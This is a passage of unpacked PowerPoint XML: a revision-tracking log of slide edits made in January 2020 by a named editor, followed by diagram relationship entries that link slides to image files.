            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:46:19.005" v="13896" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3868564701" sldId="333"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:46:19.005" v="13896" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3868564701" sldId="333"/>
            <ac:spMk id="9" creationId="{CD312071-BC93-8949-AAA2-85B0F34960AA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add ord">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:48:34.566" v="14283"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3145972916" sldId="334"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:46:44.192" v="13899" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145972916" sldId="334"/>
            <ac:spMk id="3" creationId="{BA887250-483A-334E-801F-C7C4D3C055AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:46:43.068" v="13898" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145972916" sldId="334"/>
            <ac:spMk id="9" creationId="{CD312071-BC93-8949-AAA2-85B0F34960AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:48:20.010" v="14279" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145972916" sldId="334"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:46:44.619" v="13900" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145972916" sldId="334"/>
            <ac:picMk id="5" creationId="{32732086-4308-1947-9151-8B423EBD57EF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:46:45.102" v="13901" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145972916" sldId="334"/>
            <ac:picMk id="6" creationId="{4A6EDBB8-1E4D-FA4C-8239-A4FE843CDA14}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:48:28.944" v="14282" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="424312836" sldId="335"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:48:28.944" v="14282" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424312836" sldId="335"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:19:16.067" v="14331" actId="113"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2753779009" sldId="336"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:19:16.067" v="14331" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2753779009" sldId="336"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:20:50.541" v="14591" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2571334820" sldId="337"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:20:50.541" v="14591" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2571334820" sldId="337"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:23:29.102" v="15090" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2569623389" sldId="338"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:23:29.102" v="15090" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2569623389" sldId="338"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:23:50.529" v="15185" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="73416583" sldId="339"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:23:50.529" v="15185" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="73416583" sldId="339"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:28:26.812" v="15320" actId="403"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="71850186" sldId="340"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:28:26.812" v="15320" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="71850186" sldId="340"/>
            <ac:spMk id="4" creationId="{BF36C6C6-9C89-1943-AF65-1BB2B93B6CFF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:25:20.171" v="15267" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="71850186" sldId="340"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod modCrop">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:28:07.266" v="15292" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="71850186" sldId="340"/>
            <ac:picMk id="3" creationId="{9A8A1B4E-6B83-C44C-9228-C95AE6F1F2CE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:32:51.300" v="15391" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3065475244" sldId="341"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:32:51.300" v="15391" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3065475244" sldId="341"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add modNotesTx">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:34:02.184" v="16660" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1891540535" sldId="342"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="2" creationId="{5BE94495-E6A2-F94D-AD68-0B703F8B5837}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:26:42.253" v="16220" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="3" creationId="{E2AF7967-E2B9-5D4B-BF8D-A81C9C6E1518}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:32:09.649" v="16468" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="13" creationId="{8C7637DE-7ECE-C144-822C-F07431EFCB66}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="30" creationId="{39E3965E-AC41-4711-9D10-E25ABB132D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="34" creationId="{EE362070-691D-44DB-98D4-BC61774B0E61}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="38" creationId="{3816D44C-5F7C-41A5-BDC7-B2ADF0414F9E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="43" creationId="{13BCCAE5-A35B-4B66-A4A7-E23C34A403A4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:spMk id="47" creationId="{9E4CE3CF-6887-4947-8090-EC10F183F2EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:picMk id="27" creationId="{FC9B23CC-EEDC-4C19-B228-1269EAF9D3DF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:cxnSpMk id="32" creationId="{1F5DC8C3-BA5F-4EED-BB9A-A14272BD82A1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:cxnSpMk id="36" creationId="{5A7EFE9C-DAE7-4ECA-BDB2-34E2534B8AB7}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:19:20.889" v="15442" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1891540535" sldId="342"/>
            <ac:cxnSpMk id="45" creationId="{6987BDFB-DE64-4B56-B44F-45FAE19FA94E}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:32:21.564" v="16469" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3716481078" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:32:01.481" v="16464" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3716481078" sldId="343"/>
            <ac:spMk id="13" creationId="{8C7637DE-7ECE-C144-822C-F07431EFCB66}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:32:21.564" v="16469" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3716481078" sldId="343"/>
            <ac:picMk id="4" creationId="{62A403E6-7089-5D48-82F8-8A3C20EC13C2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:31:36.587" v="16430" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3716481078" sldId="343"/>
            <ac:picMk id="6" creationId="{922E187F-C7EB-8D45-B694-72685D44AC3B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-21T16:31:36.587" v="16430" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3716481078" sldId="343"/>
            <ac:picMk id="8" creationId="{63290614-043B-F14F-8030-DDE10C34C95E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldMasterChg chg="add addSldLayout">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="926272155" sldId="2147483668"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="3058836787" sldId="2147483669"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="192330168" sldId="2147483670"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="1094425248" sldId="2147483671"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="3593284873" sldId="2147483672"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="4158856622" sldId="2147483673"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="330411186" sldId="2147483674"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="180205301" sldId="2147483675"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="3104301928" sldId="2147483676"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="3747432125" sldId="2147483677"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="add">
          <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2019-12-31T19:37:30.189" v="7" actId="26606"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1288693386" sldId="2147483679"/>
            <pc:sldLayoutMk cId="905759538" sldId="2147483678"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Anthony Pipia" userId="S::apipia@starbucks.com::f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="AD" clId="Web-{F4BD310A-95B3-B2EA-7C18-BE0BF3565C1A}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Anthony Pipia" userId="S::apipia@starbucks.com::f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="AD" clId="Web-{F4BD310A-95B3-B2EA-7C18-BE0BF3565C1A}" dt="2020-01-08T20:26:30.584" v="0" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Anthony Pipia" userId="S::apipia@starbucks.com::f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="AD" clId="Web-{F4BD310A-95B3-B2EA-7C18-BE0BF3565C1A}" dt="2020-01-08T20:26:30.584" v="0" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3259969392" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="S::apipia@starbucks.com::f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="AD" clId="Web-{F4BD310A-95B3-B2EA-7C18-BE0BF3565C1A}" dt="2020-01-08T20:26:30.584" v="0" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3259969392" sldId="299"/>
            <ac:spMk id="30" creationId="{8806DBD9-44D1-3142-99CE-F2554426BF33}"/>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21.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data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21.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data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10.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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15.svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.sv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17.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.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15.svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.sv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17.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 